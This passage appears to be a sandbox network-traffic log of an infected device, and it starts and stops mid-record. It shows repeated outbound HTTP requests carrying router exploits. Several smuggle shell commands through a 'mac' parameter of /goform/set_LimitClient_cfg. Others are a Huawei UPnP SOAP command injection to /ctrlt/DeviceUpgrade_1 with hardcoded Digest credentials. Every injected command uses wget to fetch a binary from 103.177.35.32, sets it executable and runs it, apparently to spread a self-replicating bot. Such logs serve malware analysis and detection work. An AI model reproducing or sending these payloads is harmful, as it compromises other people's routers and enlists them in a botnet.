                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1082192.168.2.235080895.53.17.578080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.444727898 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1083192.168.2.2346970162.253.171.578080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.444750071 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1084192.168.2.2348986223.251.65.538080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.444772005 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1085192.168.2.2343292115.33.53.2218080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.444806099 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1086192.168.2.2335084165.214.17.1378080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.444988966 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1087192.168.2.2357332197.125.210.23537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.517482042 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1088192.168.2.233296841.35.110.24337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.517514944 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1089192.168.2.2339888197.182.142.537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.517522097 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1090192.168.2.234305241.229.158.8437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.517522097 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1091192.168.2.2347486169.98.183.22237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.517535925 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1092192.168.2.235653841.104.140.20137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.517564058 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1093192.168.2.234105041.148.140.8437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.517611980 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1094192.168.2.235504641.1.232.6637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.527133942 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 